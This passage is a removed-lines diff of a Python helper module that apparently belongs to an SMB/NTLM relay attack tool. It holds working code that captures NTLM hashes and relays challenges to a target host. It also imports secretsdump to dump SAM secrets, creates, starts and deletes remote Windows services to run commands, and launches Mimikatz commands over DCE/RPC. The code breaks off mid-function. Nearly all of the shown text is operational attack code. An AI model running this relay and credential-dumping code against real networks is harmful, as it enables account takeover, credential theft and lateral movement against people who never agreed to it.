-sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'impacket-dev/'))) -from secretsdump import DumpSecrets - -from SMBFinger.Finger import ShowSmallResults -from socket import * - -SaveSam_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/relay-dumps/" -Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../" - -READTIMEOUT = 1 -READ = "\xc0\x00" -RW = "\xc2\x00" -MimiKatzSVCName = "" -MimiKatzSVCID = "" - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in list(kw.items()): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, list(self.fields.values()))) - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -# Function used to write captured hashs to a file. -def WriteData(outfile, data, user): - if not os.path.isfile(outfile): - with open(outfile,"w") as outf: - outf.write(data + '\n') - return - with open(outfile,"rb") as filestr: - if re.search(NetworkSendBufferPython2or3(user), filestr.read()): - return False - elif re.search(re.escape(b'$'), NetworkSendBufferPython2or3(user)): - return False - with open(outfile,"a") as outf2: - outf2.write(data + '\n') - -#Function used to verify if a previous auth attempt was made. -def ReadData(Outfile, Client, User, Domain, Target, cmd): - try: - with open(Logs_Path+"logs/"+Outfile,"rb") as filestr: - Login = Client+':'+User+':'+Domain+':'+Target+':Logon Failure' - if re.search(codecs.encode(NetworkSendBufferPython2or3(Login),'hex'), codecs.encode(filestr.read(),'hex')): - print("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)) - return True - - else: - return False - except: - raise - -def ServeOPTIONS(data): - WebDav= re.search(b'OPTIONS', data) - if WebDav: - Buffer = WEBDAV_Options_Answer() - return str(Buffer) - - return False - -def IsSMBAnonymous(data): - SSPIStart = data.find(b'NTLMSSP') - SSPIString = data[SSPIStart:] - Username = struct.unpack(' 24: - DomainLen = struct.unpack(' 60: - SMBHash = codecs.encode(SSPIString[NthashOffset:NthashOffset+NthashLen],'hex').decode('latin-1').upper() - DomainLen = struct.unpack('= 258: - Challenge = data[106:114] - if Pivoting[0] == "1": - return Challenge - else: - print("[+] Setting up HTTP relay with SMB challenge:", codecs.encode(Challenge,'hex').decode('latin-1')) - return Challenge - -#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target. -def ExtractRawNTLMPacket(data): - SecBlobLen = struct.unpack(" 1024 and suffixIndex < 4: - suffixIndex += 1 - size = size/1024.0 - return "%.*f%s"%(precision,size,suffixes[suffixIndex]) - -def WriteOutputToFile(data, File): - with open(SaveSam_Path+"/"+File, "wb") as file: - file.write(data.encode('latin-1')) - -def FindLocalIp(): - s = socket(AF_INET, SOCK_DGRAM) - try: - s.connect(("1.1.1.1", 0)) - IP = s.getsockname()[0] - s.close() - except: - print("It seems like you're not connected to any network..") - IP = '127.0.0.1' - s.close() - return IP - -def longueur(payload): - length = StructWithLenPython2or3(">i", len(''.join(payload))) - return length - -def ConvertToClassC(Host, Class): - Class = Class.strip() - Ip = re.split(r'(\.|/)', Host) - if Class == "/24": - Ip[6:7] = ["0"] - return ''.join(Ip)+Class - if Class == "/16": - Ip[4:5] = ["0"] - Ip[6:7] = ["0"] - return ''.join(Ip)+Class - else: - print("Illegal class, please use: /24 or /16") - return None - -def GenerateRandomFileName(): - return ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(random.randint(5, 15))]) - -def GenerateServiceName(): - return ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)]) - -def GenerateServiceID(): - return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)]) - -def GenerateNamedPipeName(): - return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(random.randint(3, 30))]) - -def Generateuuid(): - RandomStr = binascii.b2a_hex(os.urandom(16)) - x = uuid.UUID(bytes_le=codecs.decode(RandomStr,'hex')) - DisplayGUID = uuid.UUID(RandomStr.decode('latin-1')) - DisplayGUIDle = x.bytes - return str(DisplayGUID), str(DisplayGUIDle.decode('latin-1')) - -### -#SMBRelay grab -### - -def GrabNegotiateFromTarget(data, s, Pivoting): - ## Start with nego protocol + session setup negotiate to our target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - smbdata = s.recv(4096) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE to our target. - if smbdata[8:10] == b'\x72\x00': - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") - t = data[36:].decode('latin-1') #simply grab the whole packet except the smb header from the client. - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(4096) - challenge = ExtractSMBChallenge(smbdata, Pivoting)#Grab the challenge, in case we want to crack the hash later. - return data, smbdata, s, challenge - -def SendChallengeToClient(data, smbdata, conn): - ##Relay all that to our client. - if data[8:10] == b'\x73\x00': - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - t = smbdata[36:]#simply grab the whole packet except the smb header from the client. - packet0 = str(head)+str(t) - buffer0 = longueur(packet0)+packet0 - conn.send(NetworkSendBufferPython2or3(buffer0)) - data = conn.recv(4096) - return data, conn - -##This function is one of the main SMB read function. We request all the time 65520 bytes to the server. -#Add (+32 (SMBHeader) +4 Netbios Session Header + 27 for the ReadAndx structure) +63 and you end up with 65583. -#set the socket to non-blocking then grab all data, if our target has less than 65520 (last packet) grab the incoming -#data until we reach our custom timeout. Set back the socket to blocking and return the data. -def SMBReadRecv(s): - Completedata=[] - data='' - Start=time.time() - s.setblocking(0) - while 1: - if len(''.join(Completedata)) == 65583: - break - if Completedata and time.time()-Start > READTIMEOUT:#Read timeout - break - try: - data = s.recv(65583) - if data: - Completedata.append(data.decode('latin-1')) - Start=time.time() - else: - break - except: - pass - - s.setblocking(1) - return s, ''.join(Completedata) - -##We send our ReadAndX request with our offset and call SMBReadRecv -def ReadOutput(DataOffset, f, data, s): - if isinstance(data, str): - data = data.encode('latin-1') - head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") - t = ReadRequestAndX(FID=f.decode('latin-1'), Offset = DataOffset) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - s, data = SMBReadRecv(s) - return data, s, ExtractCommandOutput(data) - -##We send our WriteAndX request with our offset. -def WriteOutput(DataOffset, Chunk, data, f, s): - head = SMBHeader(cmd="\x2f", flag1="\x18", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") - t = SMBWriteData(FID=f.decode('latin-1'), Offset = DataOffset, Data= Chunk) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##LockingAndX //should not happens since we didn't request an oplock, but just in case.. - if data[8:10] == b"\x24\x00": - head = SMBHeader(cmd="\x24", flag1="\x88", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") - t = SMBLockingAndXResponse() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - return data, s - -##When used this function will inject an OpenAndX file not found SMB Header into an incoming packet. -##This is usefull for us when an operation fail. We land back to our shell send right away a -##Tree Connect IPC$ and start to send SMB echos so we don't loose this precious connection. -def ModifySMBRetCode(data): - if isinstance(data, str): - modified = list(data) - modified[8:10] = str("\x2d\x34") - return ''.join(modified) - else: - data = data.decode('latin-1') - modified = list(data) - modified[8:10] = str("\x2d\x34") - return ''.join(modified) - -##We send our ReadAndX request with our offset and call recv() -def SMBDCERPCReadOutput(DataOffset, length,f, data, s): - head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") - t = SMBDCERPCReadRequestAndX(FID=f.decode('latin-1'), MaxCountLow=length, MinCount=length,Offset = DataOffset) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(8092) - return data, s, ExtractRPCCommandOutput(data) - -### -#BindCall -### - -def BindCall(UID, Version, File, data, s): - Data = data - head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBNTCreateDataSVCCTL(FileName=File) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - if isinstance(data, str): - data.encode('latin-1') - - ## Fail Handling. - if data[8:10] == b"\xa2\x22": - print("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n") - return ModifySMBRetCode(data) - - ## Fail Handling. - if data[8:10]== b"\xa2\xac":##Pipe is sleeping. - f = "PipeNotAvailable" - return Data, s, f - - ## Fail Handling. - if data[8:10]== b"\xa2\x34":##Pipe is not enabled. - f = "ServiceNotFound" - return Data, s, f - - ## DCE/RPC Write. - if data[8:10] == b"\xa2\x00": - head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - x = SMBDCEData(CTX0UID=UID, CTX0UIDVersion=Version) - x.calculate() - f = data[42:44] - t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC Read. - if data[8:10] == b"\x2f\x00": - head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBReadData(FID=f.decode('latin-1'),MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00") - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - -########################### -#Launch A Mimikatz CMD -########################### -def MimiKatzRPC(Command, f, host, data, s): - ## DCE/RPC MimiKatzRPC. - ## DCE/RPC Write. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEMimiKatzRPCCommand(CMD=Command) - w.calculate() - x = SMBDCEPacketData(Data=w, Opnum="\x03\x00") - x.calculate() - t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC Read. - if data[8:10] == b"\x2f\x00": - head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBReadData(FID=f.decode('latin-1'),MaxCountLow=StructWithLenPython2or3('60: - minutes = Seconds/60 - print('Fetched in: %.3g minutes.'%(minutes)) - if Seconds<60: - print('Fetched in: %.3g seconds'%(Seconds)) - print("Output:\n", Output) - return data,s,f - -###################################### -#Launch And Create a MimiKatz Service -###################################### -def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): - ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) - w.calculate() - x = SMBDCEPacketData(Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##Error handling. - if data[8:10] == b"\x2e\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - ## DCE/RPC Create Service. - if data[8:10] == b"\x25\x00": - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command) - w.calculate() - x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - #print "[+] Creating service" - - ## DCE/RPC SVCCTLOpenService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to create the service\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[88:108].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars) - w.calculate() - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLStartService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open the service.\n") - return ModifySMBRetCode(data) - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler) - x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLQueryService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to start the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLCloseService - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to query the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - -########################### -#Stop And Delete A Service -########################### -def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): - ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) - w.calculate() - x = SMBDCEPacketData(Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##Error handling. - if data[8:10] == b"\x2e\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - ## DCE/RPC SVCCTLOpenService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to create the service\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandlerService,ServiceName=ServiceNameChars) - w.calculate() - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLControlService, stop operation. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open the service.\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService, ControlOperation="\x01\x00\x00\x00") - x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLDeleteService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to stop the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLCloseService - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to delete the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - - -########################### -#Launch And Create Service -########################### -def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): - ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) - w.calculate() - x = SMBDCEPacketData(Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##Error handling. - if data[8:10] == b"\x2e\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - ## DCE/RPC Create Service. - if data[8:10] == b"\x25\x00": - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command) - w.calculate() - x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - #print "[+] Creating service" - - ## DCE/RPC SVCCTLOpenService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to create the service\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[88:108].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars) - w.calculate() - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLStartService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open the service.\n") - return ModifySMBRetCode(data) - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler) - x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLQueryService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to start the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLControlService, stop operation. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to query the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") - x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLDeleteService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to start the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLCloseService - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to delete the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - - -########################### -#Start Winreg Service -########################### -def StartWinregService(f, host, data, s): - ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) - w.calculate() - x = SMBDCEPacketData(Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - 